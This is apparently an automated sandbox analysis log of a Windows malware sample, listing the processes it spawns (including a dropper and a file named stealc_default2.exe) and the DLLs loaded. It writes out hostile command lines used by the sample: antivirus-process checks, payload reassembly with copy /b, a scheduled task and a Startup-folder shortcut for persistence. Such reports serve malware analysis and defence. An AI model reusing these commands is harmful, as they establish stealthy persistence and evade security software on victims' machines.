File read: C:\Users\user\Desktop\file.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe "C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe"
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process created: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe "C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe"
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process created: C:\Users\user\AppData\Local\Temp\1000477001\Offnewhere.exe "C:\Users\user\AppData\Local\Temp\1000477001\Offnewhere.exe"
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process created: C:\Users\user\AppData\Local\Temp\1000817001\splwow64.exe "C:\Users\user\AppData\Local\Temp\1000817001\splwow64.exe"
Source: C:\Users\user\AppData\Local\Temp\1000817001\splwow64.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c copy Beijing Beijing.bat & Beijing.bat
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "wrsa opssvc"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr -I "avastui avgui bdservicehost nswscsvc sophoshealth"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c md 197036
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /V "CRAWFORDFILLEDVERIFYSCALE" Mtv
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Twisted + ..\Molecular + ..\Sponsorship + ..\Various + ..\Witch + ..\Spirit + ..\See + ..\Fitting T
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\197036\Jurisdiction.pif Jurisdiction.pif T
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5
Source: C:\Users\user\AppData\Local\Temp\197036\Jurisdiction.pif	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c schtasks.exe /create /tn "Wall" /tr "wscript //B 'C:\Users\user\AppData\Local\GreenTech Dynamics\EcoCraft.js'" /sc minute /mo 5 /F
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "Wall" /tr "wscript //B 'C:\Users\user\AppData\Local\GreenTech Dynamics\EcoCraft.js'" /sc minute /mo 5 /F
Source: C:\Users\user\AppData\Local\Temp\197036\Jurisdiction.pif	Process created: C:\Windows\SysWOW64\cmd.exe cmd /k echo [InternetShortcut] > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\EcoCraft.url" & echo URL="C:\Users\user\AppData\Local\GreenTech Dynamics\EcoCraft.js" >> "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\EcoCraft.url" & exit
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Windows\System32\wscript.exe C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\GreenTech Dynamics\EcoCraft.js"
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process created: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe "C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\user\AppData\Local\GreenTech Dynamics\EcoCraft.scr "C:\Users\user\AppData\Local\GreenTech Dynamics\EcoCraft.scr" "C:\Users\user\AppData\Local\GreenTech Dynamics\O"
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process created: C:\Users\user\AppData\Local\Temp\1000833001\dac4554719.exe "C:\Users\user\AppData\Local\Temp\1000833001\dac4554719.exe"
Source: unknown	Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\GreenTech Dynamics\EcoCraft.js"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\user\AppData\Local\GreenTech Dynamics\EcoCraft.scr "C:\Users\user\AppData\Local\GreenTech Dynamics\EcoCraft.scr" "C:\Users\user\AppData\Local\GreenTech Dynamics\O"
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process created: C:\Users\user\AppData\Local\Temp\1000857001\c1a4d3220c.exe "C:\Users\user\AppData\Local\Temp\1000857001\c1a4d3220c.exe"
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process created: C:\Users\user\AppData\Local\Temp\1000965001\GOLD1234.exe "C:\Users\user\AppData\Local\Temp\1000965001\GOLD1234.exe"
Source: C:\Users\user\AppData\Local\Temp\1000965001\GOLD1234.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process created: C:\Users\user\AppData\Local\Temp\1001096001\RDX123456.exe "C:\Users\user\AppData\Local\Temp\1001096001\RDX123456.exe"
Source: C:\Users\user\AppData\Local\Temp\1000965001\GOLD1234.exe	Process created: C:\Users\user\AppData\Local\Temp\1000965001\GOLD1234.exe "C:\Users\user\AppData\Local\Temp\1000965001\GOLD1234.exe"
Source: C:\Users\user\AppData\Local\Temp\1000965001\GOLD1234.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7128 -s 272
Source: C:\Users\user\AppData\Local\Temp\1000833001\dac4554719.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Users\user\AppData\Local\Temp\1000833001\dac4554719.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process created: C:\Users\user\AppData\Local\Temp\1001425001\shop.exe "C:\Users\user\AppData\Local\Temp\1001425001\shop.exe"
Source: C:\Users\user\AppData\Local\Temp\1001425001\shop.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process created: C:\Users\user\AppData\Local\Temp\1001475001\0b44ippu.exe "C:\Users\user\AppData\Local\Temp\1001475001\0b44ippu.exe"
Source: C:\Users\user\AppData\Local\Temp\1001425001\shop.exe	Process created: C:\Users\user\AppData\Local\Temp\1001425001\shop.exe "C:\Users\user\AppData\Local\Temp\1001425001\shop.exe"
Source: C:\Users\user\AppData\Local\Temp\1001425001\shop.exe	Process created: C:\Users\user\AppData\Local\Temp\1001425001\shop.exe "C:\Users\user\AppData\Local\Temp\1001425001\shop.exe"
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process created: C:\Users\user\AppData\Local\Temp\1001506001\f6f4816752.exe "C:\Users\user\AppData\Local\Temp\1001506001\f6f4816752.exe"
Source: C:\Users\user\AppData\Local\Temp\1001425001\shop.exe	Process created: C:\Users\user\AppData\Local\Temp\1001425001\shop.exe "C:\Users\user\AppData\Local\Temp\1001425001\shop.exe"
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe "C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process created: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe "C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process created: C:\Users\user\AppData\Local\Temp\1000477001\Offnewhere.exe "C:\Users\user\AppData\Local\Temp\1000477001\Offnewhere.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process created: C:\Users\user\AppData\Local\Temp\1000817001\splwow64.exe "C:\Users\user\AppData\Local\Temp\1000817001\splwow64.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process created: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe "C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process created: C:\Users\user\AppData\Local\Temp\1000833001\dac4554719.exe "C:\Users\user\AppData\Local\Temp\1000833001\dac4554719.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process created: C:\Users\user\AppData\Local\Temp\1000857001\c1a4d3220c.exe "C:\Users\user\AppData\Local\Temp\1000857001\c1a4d3220c.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process created: C:\Users\user\AppData\Local\Temp\1000965001\GOLD1234.exe "C:\Users\user\AppData\Local\Temp\1000965001\GOLD1234.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process created: C:\Users\user\AppData\Local\Temp\1001096001\RDX123456.exe "C:\Users\user\AppData\Local\Temp\1001096001\RDX123456.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process created: C:\Users\user\AppData\Local\Temp\1001425001\shop.exe "C:\Users\user\AppData\Local\Temp\1001425001\shop.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process created: C:\Users\user\AppData\Local\Temp\1001475001\0b44ippu.exe "C:\Users\user\AppData\Local\Temp\1001475001\0b44ippu.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process created: C:\Users\user\AppData\Local\Temp\1001506001\f6f4816752.exe "C:\Users\user\AppData\Local\Temp\1001506001\f6f4816752.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000817001\splwow64.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c copy Beijing Beijing.bat & Beijing.bat	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "wrsa opssvc"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr -I "avastui avgui bdservicehost nswscsvc sophoshealth"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c md 197036
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /V "CRAWFORDFILLEDVERIFYSCALE" Mtv
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Twisted + ..\Molecular + ..\Sponsorship + ..\Various + ..\Witch + ..\Spirit + ..\See + ..\Fitting T
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\197036\Jurisdiction.pif Jurisdiction.pif T
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5
Source: C:\Users\user\AppData\Local\Temp\197036\Jurisdiction.pif	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c schtasks.exe /create /tn "Wall" /tr "wscript //B 'C:\Users\user\AppData\Local\GreenTech Dynamics\EcoCraft.js'" /sc minute /mo 5 /F
Source: C:\Users\user\AppData\Local\Temp\197036\Jurisdiction.pif	Process created: C:\Windows\SysWOW64\cmd.exe cmd /k echo [InternetShortcut] > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\EcoCraft.url" & echo URL="C:\Users\user\AppData\Local\GreenTech Dynamics\EcoCraft.js" >> "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\EcoCraft.url" & exit
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "Wall" /tr "wscript //B 'C:\Users\user\AppData\Local\GreenTech Dynamics\EcoCraft.js'" /sc minute /mo 5 /F
Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\user\AppData\Local\GreenTech Dynamics\EcoCraft.scr "C:\Users\user\AppData\Local\GreenTech Dynamics\EcoCraft.scr" "C:\Users\user\AppData\Local\GreenTech Dynamics\O"
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\1000833001\dac4554719.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Users\user\AppData\Local\Temp\1000833001\dac4554719.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\user\AppData\Local\GreenTech Dynamics\EcoCraft.scr "C:\Users\user\AppData\Local\GreenTech Dynamics\EcoCraft.scr" "C:\Users\user\AppData\Local\GreenTech Dynamics\O"
Source: C:\Users\user\AppData\Local\Temp\1000857001\c1a4d3220c.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\1000857001\c1a4d3220c.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\1000965001\GOLD1234.exe	Process created: C:\Users\user\AppData\Local\Temp\1000965001\GOLD1234.exe "C:\Users\user\AppData\Local\Temp\1000965001\GOLD1234.exe"
Source: C:\Users\user\AppData\Local\Temp\1000965001\GOLD1234.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\1001425001\shop.exe	Process created: C:\Users\user\AppData\Local\Temp\1001425001\shop.exe "C:\Users\user\AppData\Local\Temp\1001425001\shop.exe"
Source: C:\Users\user\AppData\Local\Temp\1001425001\shop.exe	Process created: C:\Users\user\AppData\Local\Temp\1001425001\shop.exe "C:\Users\user\AppData\Local\Temp\1001425001\shop.exe"
Source: C:\Users\user\AppData\Local\Temp\1001425001\shop.exe	Process created: C:\Users\user\AppData\Local\Temp\1001425001\shop.exe "C:\Users\user\AppData\Local\Temp\1001425001\shop.exe"
Source: C:\Users\user\AppData\Local\Temp\1001475001\0b44ippu.exe	Process created: unknown unknown

Source: C:\Users\user\Desktop\file.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: mstask.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: dui70.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: duser.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: chartv.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: oleacc.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: atlthunk.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wtsapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: windows.fileexplorer.common.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: explorerframe.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Section loaded: rstrtmgr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Section loaded: mozglue.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Section loaded: msvcp140.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000477001\Offnewhere.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000477001\Offnewhere.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000477001\Offnewhere.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000477001\Offnewhere.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000477001\Offnewhere.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000477001\Offnewhere.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000477001\Offnewhere.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000477001\Offnewhere.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000477001\Offnewhere.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000477001\Offnewhere.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000477001\Offnewhere.exe	Section loaded: wshbth.dll	Jump to behavior
